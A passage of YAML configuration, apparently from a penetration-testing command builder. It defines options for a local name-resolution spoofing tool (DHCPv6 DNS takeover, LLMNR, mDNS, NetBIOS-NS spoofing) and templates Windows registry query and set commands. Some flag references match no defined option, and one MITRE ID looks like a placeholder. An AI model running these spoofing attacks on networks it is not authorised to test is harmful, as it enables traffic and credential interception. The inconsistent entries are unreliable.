"--dont-spoof-for {0}" 66 | optional: true 67 | selected: false 68 | type: text 69 | default: '' 70 | 71 | - name: spoofTypesTypes 72 | description: 'Only spoof these query types (A, AAA, ANY, SOA, all types are spoofed if empty)' 73 | template: "--spoof-types {0}" 74 | optional: true 75 | selected: false 76 | type: text 77 | default: '' 78 | 79 | - name: ttlDuration 80 | description: 'Time to live for name resolution responses (default 1m0s)' 81 | template: "--ttl {0}" 82 | optional: true 83 | selected: false 84 | type: text 85 | default: '1m' 86 | 87 | - name: leaseLifetimeDuration 88 | description: 'DHCPv6 IP lease lifetime (default 1m0s)' 89 | template: "--lease-lifetime {0}" 90 | optional: true 91 | selected: false 92 | type: text 93 | default: '1m' 94 | 95 | - name: routerLifetimeDuration 96 | description: 'Router lifetime specified in router advertisements (default 3m0s)' 97 | template: "--router-lifetime {0}" 98 | optional: true 99 | selected: false 100 | type: text 101 | default: '3m' 102 | 103 | - name: raPeriodDuration 104 | description: 'Time period between router advertisements (default 3m0s)' 105 | template: "--ra-period {0}" 106 | optional: true 107 | selected: false 108 | type: text 109 | default: '3m' 110 | 111 | - name: stopAfterDuration 112 | description: 'Stop running after this duration' 113 | template: "--stop-after duration {0}" 114 | optional: true 115 | selected: false 116 | type: text 117 | default: '' 118 | 119 | - name: noTimestamps 120 | description: 'Disables timestamps in the output' 121 | template: "--no-timestamps" 122 | optional: true 123 | selected: false 124 | type: text 125 | default: '' 126 | 127 | - name: logFile 128 | description: 'Log file name' 129 | template: "--log {0}" 130 | optional: true 131 | selected: false 132 | type: text 133 | default: '' 134 | 135 | - name: Flags 136 | type: label 137 | 138 | - name: noDhcpDns 139 | description: 'Disable DHCPv6 DNS takeover attack (DHCPv6 and DNS)' 140 | template: "--no-dhcp-dns" 141 | optional: true 142 | selected: false 143 | type: flag 144 | 145 | - name: noDhcp 146 | description: 'Disable DHCPv6 spoofing' 147 | template: "--no-dhcp" 148 | optional: true 149 | selected: false 150 | type: flag 151 | 152 | - name: noDns 153 | description: 'Disable DNS spoofing' 154 | template: "--no-dns" 155 | optional: true 156 | selected: false 157 | type: flag 158 | 159 | - name: noRa 160 | description: 'Disable router advertisements' 161 | template: "--no-ra" 162 | optional: true 163 | selected: false 164 | type: flag 165 | 166 | - name: noMdns 167 | description: 'Disable mDNS spoofing' 168 | template: "--no-mdns" 169 | optional: true 170 | selected: false 171 | type: flag 172 | 173 | - name: noNetbios 174 | description: 'Disable NetBIOS-NS spoofing' 175 | template: "--no-netbios" 176 | optional: true 177 | selected: false 178 | type: flag 179 | 180 | - name: noLlmnr 181 | description: 'Disable LLMNR spoofing' 182 | template: "--no-llmnr" 183 | optional: true 184 | selected: false 185 | type: flag 186 | 187 | - name: noLnr 188 | description: 'Disable local name resolution spoofing (mDNS, LLMNR, NetBIOS-NS)' 189 | template: "--no-lnr" 190 | optional: true 191 | selected: false 192 | type: flag 193 | 194 | - name: noIpv6Lnr 195 | description: 'Disable mDNS and LLMNR via IPv6 (useful with allowlist or blocklist)' 196 | template: "--no-ipv6-lnr" 197 | optional: true 198 | selected: false 199 | type: flag 200 | 201 | - name: ignoreNofqdn 202 | description: 'Ignore DHCPv6 messages where the client did not include its FQDN (useful with allowlist or blocklists)' 203 | template: "--ignore-nofqdn" 204 | optional: true 205 | selected: false 206 | type: flag 207 | 208 | - name: verbose 209 | description: 'Print debug information' 210 | template: "--verbose" 211 | optional: true 212 | selected: false 213 | type: flag 214 | 215 | - name: noColor 216 | description: Disables output styling 217 | type: flag 218 | value: "--no-color" 219 | optional: true 220 | selected: false 221 | 222 | - name: noHostInfo 223 | description: Do not gather host information 224 | type: flag 225 | value: "--no-host-info" 226 | optional: true 227 | selected: false 228 | 229 | - name: hideIgnored 230 | description: 'Do not log ignored queries' 231 | template: "--hide-ignored" 232 | optional: true 233 | selected: false 234 | type: flag 235 | 236 | - name: redirectStderr 237 | description: 'Redirect stderr to stdout' 238 | template: "--redirect-stderr" 239 | optional: true 240 | selected: false 241 | type: flag 242 | 243 | sections: 244 | 245 | - name: Local name resolution spoofing 246 | labels: ['Recon'] # Relevant labels for filtering 247 | mitre: 'T11.11' # Mitre relevant technique 248 | verb: '' # Verb that 249 | required_flags: [interfaceString] # Will reflect required params for command 250 | optional_flags: [ 251 | noColor, 252 | ip4Ip, 253 | ip6Ip, 254 | soaHostnameString, 255 | noDhcpDns, 256 | noDhcp, 257 | noDns, 258 | noRa, 259 | noMdns, 260 | noNetbios, 261 | noLlmnr, 262 | noLnr, 263 | noIpv6Lnr, 264 | spoofStrings, 265 | dontSpoofStrings, 266 | spoofforHosts, 267 | dontSpoofForHosts, 268 | spoofTypesTypes, 269 | ignoreNofqdn, 270 | ttlDuration, 271 | leaseLifetimeDuration, 272 | routerLifetimeDuration, 273 | raPeriodDuration, 274 | stopAfterDuration, 275 | verbose, 276 | noColor, 277 | logFile, 278 | noHostInfo, 279 | hideIgnored, 280 | redirect-stderr 281 | ] # Will contain any optional params for command 282 | 283 | - name: List interfaces and their addresses (the other options have no effect, except for --no-color) 284 | labels: ['Recon'] # Relevant labels for filtering 285 | mitre: '' # Mitre relevant technique 286 | verb: '--interfaces' # Verb that 287 | required_flags: [] # Will reflect required params for command 288 | optional_flags: [noColor] # Will contain any optional params for command 289 | 290 | - name: Only logs incoming queries and does not answer any of them 291 | labels: ['Recon'] # Relevant labels for filtering 292 | mitre: '' # Mitre relevant technique 293 | verb: '--dry' # Verb that 294 | required_flags: [ 295 | interfaceString 296 | ] # Will reflect required params for command 297 | optional_flags: [ 298 | noColor, 299 | ip4Ip, 300 | ip6Ip, 301 | soaHostnameString, 302 | noDhcpDns, 303 | noDhcp, 304 | no-dns, 305 | noRa, 306 | noMdns, 307 | noNetbios, 308 | noLlmnr, 309 | noLnr, 310 | noIpv6Lnr, 311 | spooftrings, 312 | dontSpoofStrings, 313 | spoofForHosts, 314 | dontSpoofForHosts, 315 | spoofTypesTypes, 316 | ignoreNofqdn, 317 | ttlDuration, 318 | leaseLifetimeDuration, 319 | routerLifetimeDuration, 320 | raPeriodDuration, 321 | stopAfterDuration, 322 | verbose, 323 | noColor, 324 | logFile, 325 | noHostInfo, 326 | hideIgnored, 327 | redirectStderr 328 | ] # Will contain any optional params for command 329 | 330 | - name: Self crafted 331 | labels: [] 332 | mitre: '' 333 | verb: '' 334 | required_flags: [ 335 | interfaceString 336 | ] 337 | optional_flags: [ 338 | ip4Ip, 339 | ip6Ip, 340 | soaHostnameString, 341 | spoofStrings, 342 | dontSpoofStrings, 343 | spoofForHosts, 344 | dontSpoofForHosts, 345 | spoofTypesTypes, 346 | ttlDuration, 347 | leaseLifetimeDuration, 348 | routerLifetimeDuration, 349 | raPeriodDuration, 350 | stopAfterDuration, 351 | noTimestamps, 352 | logFile, 353 | Flags, 354 | noDhcpDns, 355 | noDhcp, 356 | noDns, 357 | noRa, 358 | noMdns, 359 | noNetbios, 360 | noLlmnr, 361 | noLnr, 362 | noIpv6Lnr, 363 | ignoreNofqdn, 364 | verbose, 365 | noColor , 366 | noHostInfo, 367 | hideIgnored, 368 | redirectStderr 369 | ] -------------------------------------------------------------------------------- /commands/reg.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | params: 3 | - name: Path 4 | description: Registry path 5 | - name: Value 6 | description: Registry key value 7 | - name: Data 8 | description: Registry key data 9 | - name: Type 10 | description: Registry key type 11 | sections: 12 | - name: Query registry 13 | labels: [] 14 | commands: 15 | - language: EXE 16 | command: reg query {{Path}} 17 | - name: Query registry specific value 18 | labels: [] 19 | commands: 20 | - language: EXE 21 | command: reg query {{Path}} /v {{Value}} 22 | - name: Set registry value 23 | labels: [] 24 | commands: 25 | - language: EXE 26 | command: reg add {{Path}} /v {{Value}} /t {{Type}} /d {{Data}} /f 27 | --------------------------------------------------------------------------------